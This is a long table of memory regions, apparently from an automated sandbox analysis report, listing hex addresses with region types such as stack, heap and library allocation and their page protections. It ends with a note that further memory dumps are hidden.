|
stack
|
page read and write
|
||
2ACF000
|
heap
|
page read and write
|
||
4D50000
|
trusted library allocation
|
page read and write
|
||
3F0E000
|
stack
|
page read and write
|
||
75AA000
|
heap
|
page read and write
|
||
2B5B000
|
heap
|
page read and write
|
||
A520000
|
heap
|
page read and write
|
||
494E000
|
stack
|
page read and write
|
||
5F51000
|
trusted library allocation
|
page read and write
|
||
5CA000
|
unkown
|
page execute and read and write
|
||
4920000
|
trusted library allocation
|
page read and write
|
||
417E000
|
stack
|
page read and write
|
||
82F2000
|
heap
|
page read and write
|
||
2FB3000
|
trusted library allocation
|
page execute and read and write
|
||
4813000
|
trusted library allocation
|
page read and write
|
||
77DE000
|
stack
|
page read and write
|
||
2A30000
|
heap
|
page read and write
|
||
4390000
|
heap
|
page execute and read and write
|
||
2F7E000
|
stack
|
page read and write
|
||
4A5E000
|
stack
|
page read and write
|
||
2DBA000
|
trusted library allocation
|
page execute and read and write
|
||
147E000
|
stack
|
page read and write
|
||
8937000
|
trusted library allocation
|
page read and write
|
||
7F3B0000
|
trusted library allocation
|
page execute and read and write
|
||
47D1000
|
trusted library allocation
|
page read and write
|
||
6D3E000
|
stack
|
page read and write
|
||
2A6C000
|
direct allocation
|
page execute and read and write
|
||
7AF0000
|
heap
|
page read and write
|
||
A538000
|
heap
|
page read and write
|
||
76C0000
|
trusted library allocation
|
page read and write
|
||
7C2E000
|
stack
|
page read and write
|
||
3450000
|
heap
|
page read and write
|
||
92E000
|
stack
|
page read and write
|
||
796C000
|
stack
|
page read and write
|
||
9C80000
|
heap
|
page read and write
|
||
6113000
|
trusted library allocation
|
page read and write
|
||
2D8F000
|
stack
|
page read and write
|
||
E45000
|
heap
|
page read and write
|
||
500000
|
heap
|
page read and write
|
||
60E0000
|
trusted library allocation
|
page read and write
|
||
32B4000
|
trusted library allocation
|
page read and write
|
||
2E2E000
|
heap
|
page read and write
|
||
4C3C000
|
stack
|
page read and write
|
||
5956000
|
trusted library allocation
|
page read and write
|
||
2880000
|
direct allocation
|
page execute and read and write
|
||
FF0000
|
heap
|
page read and write
|
||
300000
|
unkown
|
page execute and read and write
|
||
3E4E000
|
stack
|
page read and write
|
||
43B0000
|
heap
|
page read and write
|
||
2EB0000
|
heap
|
page read and write
|
||
7180000
|
trusted library allocation
|
page read and write
|
||
77D000
|
unkown
|
page execute and read and write
|
||
4923000
|
trusted library allocation
|
page read and write
|
||
8ADC000
|
heap
|
page read and write
|
||
60A000
|
heap
|
page read and write
|
||
72C5000
|
trusted library allocation
|
page read and write
|
||
4BCE000
|
stack
|
page read and write
|
||
84A3000
|
heap
|
page read and write
|
||
21D000
|
unkown
|
page execute and read and write
|
||
324E000
|
stack
|
page read and write
|
||
4C0000
|
heap
|
page read and write
|
||
2A10000
|
remote allocation
|
page read and write
|
||
7160000
|
trusted library allocation
|
page read and write
|
||
4E4D000
|
trusted library allocation
|
page execute and read and write
|
||
37AE000
|
stack
|
page read and write
|
||
4A90000
|
heap
|
page execute and read and write
|
||
410F000
|
stack
|
page read and write
|
||
838E000
|
stack
|
page read and write
|
||
4B9E000
|
stack
|
page read and write
|
||
6156000
|
trusted library allocation
|
page read and write
|
||
4F1E000
|
stack
|
page read and write
|
||
737E000
|
stack
|
page read and write
|
||
7640000
|
trusted library allocation
|
page execute and read and write
|
||
882D000
|
heap
|
page read and write
|
||
2EE0000
|
heap
|
page read and write
|
||
3E1E000
|
stack
|
page read and write
|
||
35DF000
|
stack
|
page read and write
|
||
2DCE000
|
stack
|
page read and write
|
||
3FAE000
|
stack
|
page read and write
|
||
12F7000
|
stack
|
page read and write
|
||
4180000
|
heap
|
page readonly
|
||
3300000
|
heap
|
page read and write
|
||
333F000
|
unkown
|
page read and write
|
||
7F6F000
|
trusted library allocation
|
page read and write
|
||
4250000
|
trusted library allocation
|
page read and write
|
||
7D92000
|
heap
|
page read and write
|
||
4D64000
|
trusted library allocation
|
page read and write
|
||
2C75000
|
heap
|
page read and write
|
||
758E000
|
stack
|
page read and write
|
||
4E0E000
|
stack
|
page read and write
|
||
5C3000
|
unkown
|
page execute and read and write
|
||
2900000
|
trusted library allocation
|
page read and write
|
||
48F0000
|
heap
|
page read and write
|
||
8A24000
|
heap
|
page read and write
|
||
495E000
|
stack
|
page read and write
|
||
2DB0000
|
trusted library allocation
|
page read and write
|
||
7BC0000
|
trusted library allocation
|
page read and write
|
||
7DF0000
|
trusted library allocation
|
page read and write
|
||
1330000
|
heap
|
page read and write
|
||
684B000
|
stack
|
page read and write
|
||
32CF000
|
stack
|
page read and write
|
||
3197000
|
heap
|
page read and write
|
||
372D000
|
trusted library allocation
|
page execute and read and write
|
||
2D8C000
|
stack
|
page read and write
|
||
88CD000
|
stack
|
page read and write
|
||
7FE4000
|
trusted library allocation
|
page read and write
|
||
617D000
|
trusted library allocation
|
page read and write
|
||
7162000
|
trusted library allocation
|
page read and write
|
||
3F8E000
|
stack
|
page read and write
|
||
6BAE000
|
stack
|
page read and write
|
||
4DE7000
|
heap
|
page read and write
|
||
6A4D000
|
stack
|
page read and write
|
||
70B0000
|
trusted library allocation
|
page read and write
|
||
3D2F000
|
stack
|
page read and write
|
||
865B000
|
trusted library allocation
|
page read and write
|
||
5262000
|
trusted library allocation
|
page read and write
|
||
7D70000
|
trusted library allocation
|
page read and write
|
||
50D6000
|
trusted library allocation
|
page read and write
|
||
3240000
|
heap
|
page read and write
|
||
74D0000
|
trusted library allocation
|
page read and write
|
||
733E000
|
stack
|
page read and write
|
||
870E000
|
stack
|
page read and write
|
||
53C1000
|
trusted library allocation
|
page read and write
|
||
80F0000
|
heap
|
page read and write
|
||
6F7000
|
unkown
|
page execute and read and write
|
||
682C000
|
stack
|
page read and write
|
||
6127000
|
trusted library allocation
|
page read and write
|
||
174E000
|
stack
|
page read and write
|
||
32B0000
|
trusted library allocation
|
page read and write
|
||
316E000
|
stack
|
page read and write
|
||
81E0000
|
heap
|
page read and write
|
||
4D3000
|
heap
|
page read and write
|
||
32C0000
|
heap
|
page read and write
|
||
73B1000
|
heap
|
page read and write
|
||
88E0000
|
trusted library allocation
|
page execute and read and write
|
||
1618000
|
heap
|
page read and write
|
||
706E000
|
stack
|
page read and write
|
||
3403000
|
heap
|
page read and write
|
||
4CFC000
|
stack
|
page read and write
|
||
4936000
|
trusted library allocation
|
page execute and read and write
|
||
9026000
|
heap
|
page read and write
|
||
83FC000
|
heap
|
page read and write
|
||
8D90000
|
trusted library allocation
|
page read and write
|
||
2AF5000
|
heap
|
page read and write
|
||
7435000
|
heap
|
page execute and read and write
|
||
2910000
|
trusted library allocation
|
page read and write
|
||
30D0000
|
direct allocation
|
page execute and read and write
|
||
82C8000
|
heap
|
page read and write
|
||
4F62000
|
trusted library allocation
|
page read and write
|
||
4F20000
|
trusted library allocation
|
page read and write
|
||
7CD0000
|
trusted library allocation
|
page read and write
|
||
8130000
|
heap
|
page read and write
|
||
A8ED000
|
stack
|
page read and write
|
||
8422000
|
heap
|
page read and write
|
||
8980000
|
trusted library allocation
|
page read and write
|
||
82C4000
|
heap
|
page read and write
|
||
9A8E000
|
stack
|
page read and write
|
||
3388000
|
heap
|
page read and write
|
||
4F81000
|
trusted library allocation
|
page read and write
|
||
5CF000
|
unkown
|
page execute and read and write
|
||
4CCE000
|
stack
|
page read and write
|
||
7BDB000
|
heap
|
page read and write
|
||
2F70000
|
trusted library section
|
page read and write
|
||
53E1000
|
trusted library allocation
|
page read and write
|
||
764A000
|
stack
|
page read and write
|
||
7C40000
|
trusted library allocation
|
page read and write
|
||
4D01000
|
trusted library allocation
|
page read and write
|
||
1230000
|
heap
|
page read and write
|
||
74E0000
|
heap
|
page read and write
|
||
77E0000
|
heap
|
page read and write
|
||
4E78000
|
trusted library allocation
|
page read and write
|
||
8240000
|
trusted library allocation
|
page read and write
|
||
370E000
|
stack
|
page read and write
|
||
2FA7000
|
heap
|
page read and write
|
||
47CE000
|
stack
|
page read and write
|
||
430F000
|
stack
|
page read and write
|
||
704E000
|
stack
|
page read and write
|
||
70D0000
|
trusted library allocation
|
page read and write
|
||
2FE0000
|
heap
|
page read and write
|
||
7AF0000
|
heap
|
page read and write
|
||
E5A000
|
heap
|
page read and write
|
||
391E000
|
stack
|
page read and write
|
||
154E000
|
stack
|
page read and write
|
||
8620000
|
trusted library allocation
|
page read and write
|
||
8A40000
|
trusted library allocation
|
page read and write
|
||
2E53000
|
heap
|
page read and write
|
||
7660000
|
trusted library allocation
|
page read and write
|
||
2920000
|
trusted library allocation
|
page read and write
|
||
4C50000
|
trusted library allocation
|
page read and write
|
||
41F0000
|
heap
|
page read and write
|
||
77FE000
|
stack
|
page read and write
|
||
7B5A000
|
heap
|
page read and write
|
||
7B90000
|
trusted library allocation
|
page read and write
|
||
849E000
|
heap
|
page read and write
|
||
68CE000
|
stack
|
page read and write
|
||
400F000
|
stack
|
page read and write
|
||
AA29000
|
stack
|
page read and write
|
||
E72000
|
heap
|
page read and write
|
||
83E4000
|
heap
|
page read and write
|
||
409E000
|
stack
|
page read and write
|
||
7E20000
|
trusted library allocation
|
page read and write
|
||
32A0000
|
heap
|
page read and write
|
||
4AA0000
|
trusted library allocation
|
page execute and read and write
|
||
4D63000
|
trusted library allocation
|
page execute and read and write
|
||
81DD000
|
stack
|
page read and write
|
||
4F3B000
|
trusted library allocation
|
page execute and read and write
|
||
2B15000
|
heap
|
page read and write
|
||
4F6000
|
heap
|
page read and write
|
||
902E000
|
heap
|
page read and write
|
||
985000
|
heap
|
page read and write
|
||
4E6A000
|
trusted library allocation
|
page execute and read and write
|
||
7405000
|
heap
|
page read and write
|
||
5A2A000
|
trusted library allocation
|
page read and write
|
||
8160000
|
heap
|
page read and write
|
||
2C70000
|
heap
|
page read and write
|
||
2A10000
|
remote allocation
|
page read and write
|
||
45AE000
|
stack
|
page read and write
|
||
7D95000
|
heap
|
page read and write
|
||
96E000
|
stack
|
page read and write
|
||
5071000
|
trusted library allocation
|
page read and write
|
||
27EF000
|
unkown
|
page read and write
|
||
D46000
|
unkown
|
page execute and read and write
|
||
1550000
|
heap
|
page read and write
|
||
E5D000
|
heap
|
page read and write
|
||
77D0000
|
trusted library allocation
|
page read and write
|
||
7C50000
|
trusted library allocation
|
page read and write
|
||
320E000
|
stack
|
page read and write
|
||
CF7000
|
stack
|
page read and write
|
||
2EFF000
|
stack
|
page read and write
|
||
6A0E000
|
stack
|
page read and write
|
||
89D0000
|
heap
|
page read and write
|
||
8E8F000
|
stack
|
page read and write
|
||
13D0000
|
heap
|
page read and write
|
||
87E2000
|
trusted library allocation
|
page read and write
|
||
88F2000
|
heap
|
page read and write
|
||
2F2E000
|
stack
|
page read and write
|
||
6124000
|
trusted library allocation
|
page read and write
|
||
907F000
|
stack
|
page read and write
|
||
5B0000
|
heap
|
page read and write
|
||
7250000
|
trusted library allocation
|
page execute and read and write
|
||
7370000
|
trusted library allocation
|
page read and write
|
||
8494000
|
heap
|
page read and write
|
||
344D000
|
heap
|
page read and write
|
||
538A000
|
trusted library allocation
|
page read and write
|
||
16BF000
|
stack
|
page read and write
|
||
493A000
|
trusted library allocation
|
page execute and read and write
|
||
3740000
|
heap
|
page read and write
|
||
1417000
|
heap
|
page read and write
|
||
7D2E000
|
stack
|
page read and write
|
||
616000
|
heap
|
page read and write
|
||
14F0000
|
direct allocation
|
page execute and read and write
|
||
751A000
|
heap
|
page read and write
|
||
2E1C000
|
heap
|
page read and write
|
||
7F60000
|
trusted library allocation
|
page read and write
|
||
D45000
|
heap
|
page read and write
|
||
2AF5000
|
heap
|
page read and write
|
||
810000
|
heap
|
page read and write
|
||
32AE000
|
stack
|
page read and write
|
||
5438000
|
trusted library allocation
|
page read and write
|
||
75B2000
|
heap
|
page read and write
|
||
887E000
|
stack
|
page read and write
|
||
1358000
|
heap
|
page read and write
|
||
79F0000
|
trusted library allocation
|
page read and write
|
||
754B000
|
heap
|
page read and write
|
||
DD5000
|
heap
|
page read and write
|
||
79D0000
|
trusted library allocation
|
page read and write
|
||
301E000
|
stack
|
page read and write
|
||
2AD3000
|
heap
|
page read and write
|
||
2B2C000
|
heap
|
page read and write
|
||
4E66000
|
trusted library allocation
|
page execute and read and write
|
||
743E000
|
heap
|
page read and write
|
||
82C0000
|
heap
|
page read and write
|
||
45CE000
|
stack
|
page read and write
|
||
75A6000
|
trusted library allocation
|
page read and write
|
||
71D000
|
stack
|
page read and write
|
||
8AC1000
|
heap
|
page read and write
|
||
932E000
|
stack
|
page read and write
|
||
8E23000
|
trusted library allocation
|
page read and write
|
||
53E9000
|
trusted library allocation
|
page read and write
|
||
2DF0000
|
heap
|
page read and write
|
||
5F89000
|
trusted library allocation
|
page read and write
|
||
5130000
|
trusted library allocation
|
page read and write
|
||
717000
|
unkown
|
page execute and read and write
|
||
480F000
|
stack
|
page read and write
|
||
7B9D000
|
trusted library allocation
|
page read and write
|
||
903D000
|
heap
|
page read and write
|
||
992E000
|
stack
|
page read and write
|
||
5B5000
|
unkown
|
page execute and read and write
|
||
2AD7000
|
heap
|
page read and write
|
||
4D40000
|
trusted library section
|
page read and write
|
||
74EE000
|
stack
|
page read and write
|
||
15D8000
|
heap
|
page read and write
|
||
3A5E000
|
stack
|
page read and write
|
||
896B000
|
stack
|
page read and write
|
||
2D9D000
|
trusted library allocation
|
page execute and read and write
|
||
DE0000
|
direct allocation
|
page execute and read and write
|
||
60D4000
|
trusted library allocation
|
page read and write
|
||
32D3000
|
direct allocation
|
page execute and read and write
|
||
2E60000
|
heap
|
page read and write
|
||
811D000
|
trusted library allocation
|
page read and write
|
||
4D7000
|
heap
|
page read and write
|
||
7B9B000
|
trusted library allocation
|
page read and write
|
||
56B8000
|
trusted library allocation
|
page read and write
|
||
4D5E000
|
stack
|
page read and write
|
||
73CAD000
|
unkown
|
page read and write
|
||
30EA000
|
heap
|
page read and write
|
||
4AD5000
|
trusted library allocation
|
page read and write
|
||
51A1000
|
trusted library allocation
|
page read and write
|
||
87FD000
|
stack
|
page read and write
|
||
45C000
|
stack
|
page read and write
|
||
6D73000
|
heap
|
page read and write
|
||
34AF000
|
stack
|
page read and write
|
||
78D000
|
stack
|
page read and write
|
||
2A5C000
|
stack
|
page read and write
|
||
8770000
|
trusted library allocation
|
page read and write
|
||
771E000
|
stack
|
page read and write
|
||
50C0000
|
trusted library allocation
|
page read and write
|
||
72C0000
|
trusted library allocation
|
page read and write
|
||
30F000
|
unkown
|
page execute and read and write
|
||
41F7000
|
heap
|
page read and write
|
||
32E2000
|
trusted library allocation
|
page read and write
|
||
448E000
|
stack
|
page read and write
|
||
420E000
|
stack
|
page read and write
|
||
760000
|
heap
|
page read and write
|
||
448E000
|
stack
|
page read and write
|
||
E9A000
|
heap
|
page read and write
|
||
6CAE000
|
stack
|
page read and write
|
||
7B83000
|
heap
|
page read and write
|
||
88FE000
|
heap
|
page read and write
|
||
2AC8000
|
heap
|
page read and write
|
||
4F10000
|
heap
|
page execute and read and write
|
||
7360000
|
heap
|
page execute and read and write
|
||
539000
|
unkown
|
page execute and read and write
|
||
759E000
|
stack
|
page read and write
|
||
3421000
|
heap
|
page read and write
|
||
73DB000
|
heap
|
page read and write
|
||
73B9000
|
stack
|
page read and write
|
||
1393000
|
heap
|
page read and write
|
||
5161000
|
trusted library allocation
|
page read and write
|
||
32A0000
|
direct allocation
|
page execute and read and write
|
||
77B0000
|
trusted library allocation
|
page read and write
|
||
31B0000
|
heap
|
page read and write
|
||
3C0F000
|
stack
|
page read and write
|
||
9D000
|
stack
|
page read and write
|
||
32F0000
|
heap
|
page read and write
|
||
675000
|
unkown
|
page execute and read and write
|
||
7282000
|
heap
|
page read and write
|
||
8840000
|
trusted library allocation
|
page execute and read and write
|
||
67E000
|
unkown
|
page execute and read and write
|
||
6C4E000
|
stack
|
page read and write
|
||
3604000
|
trusted library allocation
|
page read and write
|
||
5299000
|
trusted library allocation
|
page read and write
|
||
30DE000
|
stack
|
page read and write
|
||
481E000
|
stack
|
page read and write
|
There are 1974 hidden memdumps, click here to show them.